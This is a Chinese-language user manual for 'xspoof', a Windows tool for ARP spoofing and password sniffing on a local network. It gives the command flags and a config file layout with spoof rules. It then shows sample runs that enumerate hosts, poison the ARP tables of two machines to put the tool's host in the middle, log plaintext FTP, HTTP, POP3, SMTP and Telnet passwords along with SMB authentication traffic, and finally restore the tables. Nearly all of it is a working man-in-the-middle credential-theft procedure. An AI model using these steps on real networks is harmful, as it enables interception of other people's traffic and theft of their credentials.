1、命令行参数
-l: 查看本机网络接口;
-f: 枚举局域网内所有机器的IP-MAC信息(需要配合"-i"参数设置正确的网络接口);
-i <if_number>: 指定网络接口;
-p <pass_log_file> [smb_log_file]:嗅探FTP/HTTP/POP3/SMTP密码、TELNET会话内容并记录到pass_log_file。若指定了smb_log_file参数,将同时记录139/445端口的SMB/CIFS协议中与登录认证、共享资源访问相关的数据报至smb_log_file(兼容libpcap/tcpdump格式);
-s: 开始ARP欺骗(需要配合"-i"参数设置正确的网络接口);
-r: 恢复被欺骗主机的ARP表(需要配合"-i"参数设置正确的网络接口);
-c <config_file>: 由配置文件读取默认服务端口及ARP欺骗列表,默认配置文件名为"xspoof.ini")。
2、操作步骤
1) 使用"-l"参数查看本地网络接口;
2) 使用"-f"参数获得局域网内所有机器的IP-MAC信息;
3) 使用"-s"参数进行ARP欺骗,或同时使用"-p"参数嗅探密码。需要通过"-i"参数指定正确的网络接口和通过"-c"参数指定配置文件名。
4、配置文件各字段含义
#================================================
# 指定各服务默认端口(用于嗅探密码)
[SERVICE_PORT]
HTTP=80
FTP=21
SMTP=25
POP3=110
TELNET=23
#================================================
# "LOCAL_MAC"为本机MAC地址,其他为"SPOOF_LIST"字段
# 中各被欺骗主机的IP及MAC地址对应表(可由"-f"参数获得)
# 示例:
# LOCAL_MAC=00-0d-88-f0-e2-1e
# 192.168.0.1=02-0d-3a-26-49-b5
# 192.168.0.2=00-0a-eb-88-cc-8e
# 192.168.0.3=00-0d-88-f0-e2-1e
# 192.168.0.4=00-0b-b8-a0-32-0c
[MAC_LIST]
LOCAL_MAC=
#================================================
# ARP欺骗列表,每条规则为一条单向欺骗规则
# 假设A、B为局域网内正常机器,C为嗅探机器
# 原数据报路径为A->B,欺骗后路径为A->C->B
# 欲嗅探两台机器间的双向通讯数据,需要添加两条规则
# 示例:
# 1=192.168.0.1,192.168.0.2
# 2=192.168.0.2,192.168.0.1
# 3=192.168.0.3,192.168.0.4
# 4=192.168.0.4,192.168.0.3
[SPOOF_LIST]
以下为配置文件示例:
[SERVICE_PORT]
HTTP=80
FTP=21
SMTP=25
POP3=110
TELNET=23
[MAC_LIST]
LOCAL_MAC=00-0d-88-f0-e2-1e
192.168.100.119=00-0a-eb-88-cc-8e
192.168.100.254=02-0d-3a-26-49-b5
[SPOOF_LIST]
1=192.168.100.119,192.168.100.254
2=192.168.100.254,192.168.100.119
5、程序演示
命令1:xspoof -l
WinPCap version: 3, 1, 0, 24
1. \Device\NPF_GenericNdisWanAdapter (Generic NdisWan adapter)
2. \Device\NPF_{C198BDE0-2B71-465D-9340-54DB0C44BE83} (D-Link AirPlus Wireless Adapter)
Address Family: #2
Address Family Name: AF_INET
Address: 192.168.100.3
Netmask: 255.255.255.0
Broadcast Address: 255.255.255.255
3. \Device\NPF_{C915675D-0BD7-4E77-9F7B-1669CA4FF29F} (VMware Virtual Ethernet Adapter)
Address Family: #2
Address Family Name: AF_INET
Address: 192.168.236.1
Netmask: 255.255.255.0
Broadcast Address: 255.255.255.255
命令2:xspoof -f -i 2
WinPCap version: 3, 1, 0, 24
[LOCAL INFORMATION]
Link type: 0
Link speed: 54000000 b/s
Broadcast: 255.255.255.255
Subnet mask: 255.255.255.0
IP address: 192.168.100.3
MAC address: 00-0d-88-f0-e2-1e
[MAC LIST]
IP: 192.168.100.3 MAC: 00-0d-88-f0-e2-1e
IP: 192.168.100.119 MAC: 00-0a-eb-88-cc-8e
IP: 192.168.100.254 MAC: 02-0d-3a-26-49-b5
260 packets received, 0 packets lost.
命令3:xspoof -i 2 -s -p pass.log
Start sniffer thread succeed.
Listening on D-Link AirPlus Wireless Adapter...
Enable IP_ROUTER succeed.
192.168.100.119 -> M -> 192.168.100.254 ...
192.168.100.254 -> M -> 192.168.100.119 ...
Build arp packet complete, arp spoof started.
已经开始在192.168.100.119和192.168.100.254之间进行欺骗,使双方均认为192.168.100.3的MAC地址是对方的真实MAC地址,同时在192.168.100.3启动sniffer,对192.168.100.119和192.168.100.254之间传输的明文密码进行嗅探,结果保存在"pass.log"文件中。
命令4:xspoof -i 2 -r
WinPCap version: 3, 1, 0, 24
Send to 192.168.100.119: MAC of 192.168.100.254 is 02-0d-3a-26-49-b5
Send to 192.168.100.254: MAC of 192.168.100.119 is 00-0a-eb-88-cc-8e
Build arp packet complete.
Restore the arp table of target complete. |
